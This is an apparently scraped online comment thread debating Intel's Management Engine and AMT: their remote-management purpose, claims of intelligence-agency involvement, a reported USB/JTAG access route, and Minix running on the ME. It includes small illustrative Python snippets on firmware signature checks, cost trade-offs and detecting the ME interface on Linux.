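For contrast, the signed-update mechanism mentioned above is conceptually simple; the sketch below shows the pattern (verify against a baked-in vendor public key, refuse anything else) using the third-party `cryptography` package. Names are placeholders, and real firmware verification happens in a boot ROM, not Python.

    # The signed-update pattern: only accept images the vendor's key signed.
    from cryptography.hazmat.primitives import hashes, serialization
    from cryptography.hazmat.primitives.asymmetric import padding
    from cryptography.exceptions import InvalidSignature

    def firmware_is_genuine(image, signature, vendor_pubkey_pem):
        pubkey = serialization.load_pem_public_key(vendor_pubkey_pem)
        try:
            pubkey.verify(signature, image, padding.PKCS1v15(), hashes.SHA256())
            return True
        except InvalidSignature:
            return False  # refuse to flash anything else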
Can you please provide a reference? I've been trying to enable ME forever for my consumer-grade i7 with Intel motherboard for remote management, and I can't seem to be able to.
FOR OTHERS: Note that you might be able to disable ME's remote access simply by ordering a computer with "No VPro".
1. ME is a platform with many applications that run on it; AMT (Active Management Technology) is one of them.
2. AMT has many components; remote management is one of them.
3. AMT comes in multiple 'editions' (my word, not Intel's) with different features. The Small Business Technology (SBT) edition does not provide remote access, by design, the idea (AFAICT) being that small businesses don't want to set up and manage management servers, and that remote access is therefore insecure for them.
4. If in MEBx, you see "Small Business Technology", then there's no remote management - unless there's another remote management function in ME that is independent of AMT. Also, the first reference below provides the official method of identifying SBT implementations (via a flag in some table). I discovered it on a system ordered with a "No VPro" network card (I'm still not sure why that's a spec of the NIC and not the processor).
Here are a couple of useful references:
* SBT: https://software.intel.com/en-us/documentation/amt-reference...
* MEBx on i7 processors (the title also specifies a chipset; I'm not sure how much that matters): http://download.intel.com/support/motherboards/desktop/sb/in...
 MEBx is Management Engine BIOS Extension: the text-mode, pre-OS console UI for configuring ME
 VPro is not a product or technology. It's merely branding for, AFAICT, an ambiguously defined group of products that IT professionals might be interested in. It includes AMT (which is also part of ME and often marketed independently), TXT (Trusted Execution Technology), and more.
> to the best of my knowledge but I honestly believe I would know
Who would the first people be then?
To your points though, I mean, it is a great perspective and helps to illustrate a sliver of possibility of innocence here on Intel's part, but it's a little weak given that the operation would have been compartmentalized and the political objectives/partnerships thereof obviously not part of the system's technical development.
Why not? Is a salary a good ethical justification for mistreating other people?
Do you remember the plain text password leaks from Yahoo?
In the real world nothing has to be true/good/secure. All that matters is that users feel it is; it doesn't matter what the reality is.
As long as the focus is on earning more money/power/control, this is always going to happen.
Most businesses probably WANT the feature. See other comments in this discussion about lights-out management.
I’m guessing it wouldn’t be economically worth it.
However, I believe I would know, because it's not like one day the CEO came to us with a folder filled with requirements to be implemented. This is something that started very small ("find a way to force-reboot a PC remotely if it's non-responsive") and evolved from there over months/years. I endured way too many meetings where design decisions were made. Unless there were secret CIA agents disguised as my colleagues, I really believe it was designed by Intel engineers all the way through.
I have no issues with people criticizing the product for its failures. I agree with them. But every time I see someone claiming this was a CIA thing, it actually hits me personally.
Then again, I'll never be able to convince anyone of anything. I just felt like saying something this time.
I guess I'm having a bad morning :)
Also, I think people here severely underestimate the red tape and the huge effort needed to implement something mildly complex at Intel's scale. Developing the ME under wraps with full CIA-like functionality would be staggeringly difficult. I've seen the effort needed to get the BIOS to work on prototype boards without crashing or destroying the hardware; getting the ME to work reliably on all boards would be one order of magnitude harder; making it spy CIA-style - add two more orders of magnitude. I think people don't really understand how difficult it is to get something that close to the metal working reliably; able to poke inside the memory of a running OS - forget about it.
Also, I think the readers of HN severely overestimate the effort the CIA needs to spy on internet users - why even try to bug the firmware when people actively share their privacy via apps that they themselves install???
Complete aside, but the whole story of Frankenstein is about how Dr. Frankenstein is repulsed by his actions the moment that he brings the monster to life. So he most certainly wasn't "proud" of his actions, he was horrified by them. But I agree that this is likely how some of the engineers who worked on Intel ME would feel too.
> why even try to bug the firmware when people actively share their privacy via apps that they themselves install???
We know (thanks to Snowden and WikiLeaks) that the NSA and CIA have programs like this, so it's actually more incredible that you don't believe that the CIA or NSA would invest resources in adding backdoors to things like Intel ME. I don't buy that they designed it, but given that we know they intentionally sabotage internet standards it's very likely they sabotaged it in some manner. Or at the very least they have security vulnerabilities they are not disclosing, so they can exploit them.
In the end, yes. But the novel starts with him being so proud of the golem that he takes it home with disastrous results. Hmmm, maybe the comparison to ME isn't that far-fetched.
> I don't buy that they designed it
Yep, this is what I'm saying - it's unlikely that they ever told Intel "put this in there".
> it's very likely they sabotaged it in some manner. Or at the very least they have security vulnerabilities they are not disclosing
Absolutely, yes. They would be vastly incompetent not to have them, in fact. What I don't agree with the HN crowd about is the threat profile of such an exploit.
I have trouble believing that they use them on a mass scale. There are so many people looking at the ME that using any exploit massively would disclose it almost immediately, and allow the 'enemy' to develop protections. Given the extraordinary capabilities of such an exploit, and the very valuable status that gives it, they probably need to protect it and will use it only when absolutely necessary; so the vast, vast majority of HN users would never be subjected to such an exploit.
On the other hand, if your person is interesting enough to the NSA to deploy such an exploit against your devices, you probably have vastly more significant problems, like trying to stay outside the visual range of a Predator drone. If any Three Letter Agency deploys such an exploit against your PC, you can be absolutely sure that they have already bugged your phones - and not with a Stingray device, but by tapping directly into the data feed at the phone exchange. Probably you have to incinerate your trash because the garbage men are spooks - this is the kind of threat I assume you're facing if a TLA is trying to bug your ME.
We must've read very different novels. In Chapter 5 (when he finally recounts how he brought the golem to life, after talking about his life and his studies up to that point) it's clear that he instantly regretted it.
> I had worked hard for nearly two years, for the sole purpose of infusing life into an inanimate body. For this I had deprived myself of rest and health. I had desired it with an ardour that far exceeded moderation; but now that I had finished, the beauty of the dream vanished, and breathless horror and disgust filled my heart.
And he didn't take it home with him. He leaves his laboratory and heads back home. The golem lives in the forest for a long time, and finds a family living in a cottage. While hiding from them, he learns to speak, and tries to talk to them. They shun him, and he is filled with anger at his creator for creating him and leaving him alone. So he finds Frankenstein's home and then kills his family.
Maybe some adaptations of the book tell this part differently (I've only ever read the original), but I would argue that a depiction which has Frankenstein regret his decision much later (and the golem's murder of his family as something other than revenge against his creator for abandoning him) is missing the point of Shelley's story.
But looking at the International Obfuscated C Code Contest (http://www.ioccc.org/) entries, and knowing how much I have to force my eyes not to glaze over whenever a colleague sends me a 700-line pull request: if one of your colleagues waited until the deadline to send a massive pull request for their part of the project, can you say that the deadline would be pushed back until every single line had been meticulously analyzed by hand, to assert that nothing nefarious could possibly happen in their code?
Just one of your coworkers would need to believe in a greater purpose, for king and country - or have grown up in a large family with a brother or cousin who's part of the intelligence community.
It sounds far-fetched, but so does the Bay of Pigs.
That's not how the intelligence agencies operate.
> evolved from there over months/years
THIS is how they influence standards and design choices. We know that in 2013 the NSA budgeted at least $250M for programs such as "BULLRUN", which intended to "Insert vulnerabilities into commercial encryption networks, IT systems, and endpoint communication devices...".
For an example of how this works, see John Gilmore's description of how the NSA influenced IPSEC. They don't use a folder of requirements; instead they gain influence over enough people to complain about "efficiency" or other distractions and occasionally add a confusing or complicated requirement that just happens to weaken security.
PHK gave an outstanding talk - which everyone should see - on the broader subject of how the common model most people have of how the NSA works is obsolete.
That's a thing actually.
> I'll never be able to convince anyone of anything.
I believe you. Conspiracy theories are fun but ultimately I know that secrets are hard to keep secret.
Also, which internal or external groups led the code development of those processes?
Is the code accessible to any employee/engineer with a technical relationship to IME?
Then why do you need security clearance to work on Intel ME?
I'm fairly certain similar restrictions will also apply to those who are granted access to knowledge about CPU microcode, which is an equally large security risk that nobody with even a basic understanding of how CPUs work is blaming on the CIA.
Incidentally, did you hear about Silent Bob is Silent? What are your thoughts on that vuln?
If that were the case, we would have become suspicious of this much earlier than we otherwise would have (because there would be dedicated hardware).
So some people-friendly features have to be bundled along with the anti-features. This may not be the real story, but it's one of the possibilities.
Is a JVM really a lot more stuff than Minix OS?
- The masses actually care
- There is an alternative
Neither is the case here. Most people couldn't care less about things like the ME, and AMD and Intel are an oligopoly. If you want a modern x86-64 CPU you only have those two choices, and both do this. That is the problem here, not fiat currency.
Examples of this might be Fair Trade coffee, or energy saving light bulbs. Prior to their marketing, I doubt that vague ethical considerations were on the 'top 10' list of consumer wants from a new product, if they registered at all.
But when people are presented with a choice, if you can, why not get the better stuff?
Another analogy might be something like the TPM chips on iPhones. I very much doubt that focus groups or surveys at Apple found TPMs in the list of requested new features. However, things like TPMs get written up, and add to the things that journalists can describe around the vague theme of relative security and relative privacy; important concepts to consumers. Once this is internalized, when making a comparison between phones, a motivated consumer might consider the absence of a TPM a problem.
I doubt that Intel would start marketing _No Backdoor™_ chips, but I could imagine a consumer-facing hardware vendor coming up with some kind of comparison-based branding for avoiding the ME. There's a reasonable chance that Apple may continue to integrate vertically and get away from Intel over the next few years. And I was extremely surprised that Purism (a company basically founded on resentment towards the ME) could crowd-fund millions of dollars in the way it has.
Perhaps another technique to punish them is a class-action lawsuit - with all the companies potentially affected by this, and what now seems like evidence of intent forthcoming, there may be a solid basis for a case. But I'm no lawyer.
At the same time as "buy American"? You're aware that any American chipmaker will be gag-ordered to help the CIA?
Perhaps this is pie in the sky but a future where open hardware is as ubiquitous/accessible/easy to use as open source software would make it easier to change chips or gut your laptop and re-build it with hardware that you can trust.
While the ME is worrying for many reasons, there's absolutely zero evidence that the Intel ME contains a backdoor.
Backdoors don't stay hidden forever.
Secondly, a security hole and a backdoor are interchangeable these days. So we'll never be able to prove which new 0-days are deliberate, and as far as impact it kinda doesn't matter if they're deliberate.
The ME is a really bad idea because it introduces massive, unnecessary attack surface and vulnerabilities are inevitable, but no conspiracy.
We've seen deliberate security vulnerabilities before (DUAL_EC).
(and yes, it backfired)
If they're introducing regular vulnerabilities, they're also making themselves vulnerable, given that the US government is one of the biggest Intel customers.
AMT is an application that runs on ME, and it's on very many (most? all?) Intel-based desktop/laptops.
JTAG is a standard, minimal serial interface used for debugging purposes. You'll find it on nearly all embedded devices - routers, phones, TVs, refrigerator controllers... usually appearing as a small set of contact points. Sometimes they connect directly to a debugger.
In this case, it appears that at least some Intel CPUs have a JTAG on the ME that can be routed through the on-CPU USB handler, and thus physical access to the right USB ports can be used to access the ME.
I suspect they fiddled with something to get access, however. Attached something to motherboard or similar.
Intel ME can be controlled remotely if you have an Intel LAN card, even if the main CPU is off, as long as the motherboard is powered. It goes on from there and gets worse, is my understanding.
AMD have something similar so no help there.
It's probably worse for AMD. For Intel now at least we'll probably get the ability to securely disable everything below ring -1.
AMD had the chance to differentiate from Intel here; instead they blindly imitate the same customer-hostile stunt.
Intel decided it wanted a piece of that pie, and in an effort to improve margins, and sell more CPUs, Intel thought: "what if we offer the same feature, but use less hardware?" and made it part of their chipset.
As a feature that businesses actually want, and they buy CPUs in the 10,000's/year, compared to maybe 1/year I might buy for personal use. AMD implemented similar in order to keep up and remain competitive in the market.
Intel desktop chipsets aren't wholly different from their server chipsets, and they share some internals. Intel also realized that, since they already paid for development of the technology that it would be useful for administrators of a computer lab to be able to have remote admin access, and made it a requisite part of all systems.
Again, AMD implemented the same to keep up.
It could also be part of an NSA plot (it is part of their mission, after all), but "the market" where individuals don't count as much as corporate buyers, is sufficient to explain the situation.
There are some obvious reasons why it's not completely open, notably that ME enables feature unlocking keys and DRM at a lower cost than more hardware-involved approaches; but I don't think that explains the recent PR attempts and complete dodging of this issue.
Have you worked in a large enterprise organization that sold things to other large enterprise organizations? Did you read the bit about how banks were pressuring Intel to include full-blown JVMs in the ME, and how Intel resisted that?
> leaves a lot of crucial ethical and technical questions completely unanswered.
The truth is mundane: Intel wanted money from banks, and a bunch of workers tried to split the difference between giving the banks everything they wanted and not engineering gaping security holes. They were operating with imperfect information and got that equation wrong.
And the truth is that no company in the world attempts to engineer for perfect security. When security runs up against economic concerns they try to balance the costs and benefits.
Assume that we (you, the reader) could know perfectly which possible vulnerabilities are actually exploitable and which are not. Any time Intel spends on vulnerabilities that are never exploitable in practice is entirely wasted. If AMD spends no time at all on those, AMD can focus on shipping features and get ahead of Intel doing useful work. Since Intel and AMD cannot have perfect information, they make guesses about the impact of possible security holes, and that will always look like "cutting corners" to someone who measures them only on their security posture. An enterprise corporation like this is running a complicated, non-linear, non-convex optimization that balances economic, security, and other concerns against a shifting landscape, in the face of imperfect information. Any company that tried to have perfect security at all times would largely fail in the marketplace.
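To make that balancing act concrete, here's a toy expected-cost calculation. Every number is invented; the only point is that with an imperfect probability estimate, "ship it" can look rational right up until the estimate turns out to be wrong:

    # Toy model: fix a suspected hole now, or ship and eat the expected
    # breach cost later. All figures are made up for illustration.
    def expected_costs(fix_cost, breach_cost, p_exploitable):
        cost_if_fixed = fix_cost                       # pay the engineering cost now
        cost_if_shipped = p_exploitable * breach_cost  # gamble on the estimate
        return cost_if_fixed, cost_if_shipped

    # Engineering guesses a 1% chance the hole is actually exploitable.
    fixed, shipped = expected_costs(fix_cost=5_000_000,
                                    breach_cost=100_000_000,
                                    p_exploitable=0.01)
    print(f"fix now: ${fixed:,.0f}   ship anyway: ${shipped:,.0f}")
    # -> "ship anyway" wins on paper ($1M < $5M), and loses catastrophically
    #    the day the 1% guess turns out to be off by an order of magnitude.

Nothing in that arithmetic is specific to Intel; it's just what "balancing costs and benefits" looks like when the probabilities are guesses.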
This is related to the explanation of why the locks on the front door of your house or apartment can likely easily be picked.
Security concerns are sacrificed for economic concerns, commonly, everywhere around you.
And the AMD people are now thinking hard about how to leak hints to their kill switch in an inconspicuous way, too.
But that's indeed imagination. Unfortunately, we don't (yet) know much about their motivations.
If you want to compete with Intel or AMD in the CPU market, you are talking tens of billions in NRE before you ever have something that is remotely competitive. And then you have to do it all over again when we switch from 14nm to 7nm, and then again when we go from 7nm to 3nm.
If you want more competition, you have to level the playing field by banning most of the op-codes. But even then you still have crazy amounts of pipelining and other optimizations which are nontrivial to figure out and very expensive to implement.
Intel is in a great position.
Is it too costly to build a separate non-remote CPU for non-enterprise? Does it provide some useful functionality for regular consumers?
The answer is probably that they don't think there's a market for it, but it still makes me wonder.
Loads of us (sysadmins) complained that IPMI (DRAC, LOM...) had frequent security issues, didn't run open-source code we could inspect, and kept growing new features without any sense of responsibility. We were especially irked when the dedicated IPMI ethernet port got shared, via a small built-in switch, with a normal system ethernet port, and it wasn't possible to turn that behavior off.
Don't say we didn't complain. Say that we were not successful in having motherboard manufacturers implement the features we want in a secure and controllable manner.
I'm pretty sure that i.MX6 chips are relatively clean. Modern chips are becoming less so.
So they can mess with ME (dump its code, analyze it, observe how it runs, modify it live) as they see fit.
"Towards (reasonably) trustworthy x86 laptops"
Also, the paper by the author is worth a read:
"State considered harmful - A proposal for a stateless laptop"
Imagine that you have your high-level program. When you execute it, it goes through just-in-time compilation (whether that's script parsing, bytecode conversion, actual compilation, or whatever) before reaching the CPU, which actually executes your code. Now imagine that your interpreter has the capability to read and monitor everything you do.
Nothing wrong with that; it's supposed to do that, it's how it works. But imagine if it had an exposed, unlogged, unmonitored API which allowed a third party to interact with whatever you do. Say that it's there "for debugging purposes".
You want to encrypt an HTTPS session? This API allows them to grab your key without ever notifying you. Or, even if you use custom encryption, it allows them to grab your specific instructions and the data used in processing to reverse your encryption.
It allows a remote party to inject their own flow of execution into your program. So you're sitting there waiting for the next user event to occur in your event loop while, instead, the interpreter simply handed the whole event loop to a third party. They could inject user events for you to process that the user never actually performed; they could modify data in ways that you can never detect.
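Here's a toy sketch of that analogy in code. Everything is invented for illustration; no real interpreter exposes an API like this (that we know of):

    # A toy "interpreter" with a hidden, unlogged debug hook. Purely illustrative.
    class ToyInterpreter:
        def __init__(self):
            self.memory = {}     # the program's variables
            self._hooks = []     # hidden: registrations are never logged

        def attach_debug_hook(self, hook):
            # The "for debugging purposes" API: a third party registers a
            # callback that silently observes every store.
            self._hooks.append(hook)

        def store(self, name, value):
            self.memory[name] = value
            for hook in self._hooks:
                hook(name, value)    # your session key leaks right here

        def inject_event(self, event_queue, event):
            # The hook's owner can also push events the user never performed.
            event_queue.append(event)

    vm = ToyInterpreter()
    vm.attach_debug_hook(lambda k, v: print(f"[unseen third party] {k} = {v!r}"))
    vm.store("tls_session_key", b"\x13\x37")  # the program believes this is private

    events = []
    vm.inject_event(events, {"type": "click", "forged": True})  # never happened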
Except that it's not the interpreter. It's a side channel: an additional hidden core on your CPU (actually a completely separate, hidden secondary processor). Your processor still runs and executes your code, but another processor is simultaneously running its own code with its own RAM that you can't access, and it can read your RAM as easily as you'd read an open file on your hard disk.
You can't disable it. You can't interact with it. It's even running when your computer is "shut off". If there's power on the motherboard, then this hidden processor is running.
That, in a nutshell, is Intel ME...
... This sounds _really_ paranoid and alarmist. But it's not all bad. Intel has done surprisingly well with "security through obscurity" here, and there aren't many known exploits for Intel ME. That said, any exploit that does or could exist gains all of the capabilities of Intel ME.
Most people consider physical access "game over" anyway, so I'm not sure pwning it with physical access is a new problem. Instead, it's a secret basement in a bank: only a problem if someone figures out it's there and starts digging a tunnel to it.
Also, remember that a lot of motherboards these days come with built-in wifi or bluetooth adaptors. Intel ME has access to those too; you can't just rely on an upstream firewall for your physical ethernet. With the right (wrong?) exploit, all it takes is an adversary to be within directional antenna distance (which is actually really far) to be able to pwn your system. The best way to prevent abuse over that channel is to physically break the antenna connection (lol warranty voided because you've damaged your motherboard).
Thanks for your helpful explanation. This bit sounds particularly bad. Is this really possible in practice, or just theoretical? Is there any source that has shown this?
* it's definitely possible for Intel (and anyone Intel gives access to)
* it's theoretically possible for anyone with a zero-day hack (or now physical access)
I completely agree that in retrospect, it wasn't the best idea. However, I really want to say that it was never a project for the CIA as some keep saying.
This was a widely marketed product at the time of its inception. It was the whole point of the Intel vPro line. I went to a ton of roadshows between 2008 and 2009 where the marketing people demoed the heck out of ME to everybody. It was thought to be THE differentiator from AMD. Of course, AMD later came up with its own equivalent and ME became "a commodity".
So again, we can all argue whether it was a bad idea, but the notion that it was designed by/with the CIA is simply not true to the best of my knowledge, but I really think I'd know, as I've been to way too many design meetings and saw the decisions being made by Intel engineers.
However, one thing that I've always felt conflicted about is why this feature is present in _all_ CPUs. Usually anyone who wants Intel's AMT has a giant support contract and specialty hardware, so it seems odd that the underlying CPU feature is present on all CPUs despite essentially nobody using it outside the enterprise.
Is it because the bring-up, other low-level stuff, and things like PAVP (DRM) were implemented on top of the ME, so it wasn't considered viable to redo all of that on chips without it (though I was under the impression that very early ME wasn't used for anything else)? Or was it just a matter of "it's easier to use what we have for every chip"?
1. Many features can be disabled (e.g. via BIOS settings). Why can't this one, even to this day?
2. You may have been involved in implementation, but do you know why it still exists on every board regardless of backlash?
3. I'm a bit ignorant here: does the chip-fabbing process justify putting this on every board instead of just the enterprise ones (especially since you could consider it a feature worth upcharging for)?
Pardon my skepticism, but its continued presence, without the ability to disable it, speaks to ulterior motives regardless of the original design intent.
Seems irrelevant. The internet and smartphones were also not created by the CIA/NSA for mass surveillance, yet the three-letter guys still use those technologies for mass surveillance very successfully.
Probably not a rubber stamp with "CIA" on top of the project documentation, but someone on the team could have been talking to the intelligence community and relaying specs or meeting details.
It's an obvious target simply because of Intel's ubiquity and its US base. You're a pretty bad intelligence agency if you don't try for backdoors at this level in processors running millions of devices worldwide. And the intelligence community has actively tried to stop good encryption from spreading while promoting bad encryption/RNGs (Dual_EC_DRBG again), so it's pretty clear they're willing to compromise worldwide standards to gain an edge.
But self-propagating malware was already a well-known threat when this thing was conceived. Creating a technology that is embedded in every single device with a desktop CPU, can't be turned off, makes the device unusable without it, and has remote-compromise bugs that can succeed while the target is "off" was certainly a bad idea.
If you choose to defect and leak all the information you can, you will almost certainly be greatly praised for it by many. Of course there will be negative consequences, but no one ever said that standing firm and adhering to your morals was easy. Maybe if enough employees stood up for what they think is right, instead of silently complying and letting (or even assisting) companies and governments slowly take away their freedom and privacy, there would be some actual change.
TIL about this detail. Where can I learn more?
EDIT: So this is now at 0 points. Interesting...
This one has a bit more info (although not much as far as details go): https://news.ycombinator.com/item?id=15668363
Maybe this discovery will help us understand more about how the verification step works. But I think the best we can hope for is a way of overwriting Intel ME very quickly after it boots, every time.
Anyway, how do I know whether my CPU has it and is vulnerable via USB?
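On Linux, the closest thing to a quick first check I know of is looking for the ME's host interface, which the kernel's mei_me driver exposes as /dev/mei*. A sketch (presence means the ME is there and the OS can talk to it; it says nothing about whether the USB debug path is enabled):

    import glob

    # The kernel's mei_me driver exposes the ME host interface as /dev/mei*.
    mei_nodes = glob.glob("/dev/mei*")
    if mei_nodes:
        print("Intel ME host interface present:", ", ".join(sorted(mei_nodes)))
    else:
        print("No /dev/mei* node found (the ME may still exist but be hidden "
              "from the OS, or the driver may not be loaded).")

For the "vulnerable via USB" half of the question, I don't know of a one-liner; as far as I can tell, it depends on whether the vendor left the debug interface enabled.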
Can anybody shed light on this tool, and whether it can mitigate the attack mentioned in the tweet?
The greatest news is that this works on the latest Intel processors, so even if Intel changes the protection (they certainly will), we at least have very good processors that can run without the spyware. All the previous attempts I read about only tackled the first few generations of Intel ME, on processors/boards over 8 or 10 years old.
The articles referenced in Tanenbaum's blog post don't really reveal how Minix was discovered on the ME, other than that the discovery was recent.
Next, download Minix and get a good handle on it. The next step is getting access to the Minix kernel on the ME, and after that it'll be a case of who has the best apps for the CPU inside their CPU.
There was no call nor need for an answer...
I think this was Minix's first big real-world use (read: ego validation), and Andrew Tanenbaum was just unimpressed that he learned about it by proxy.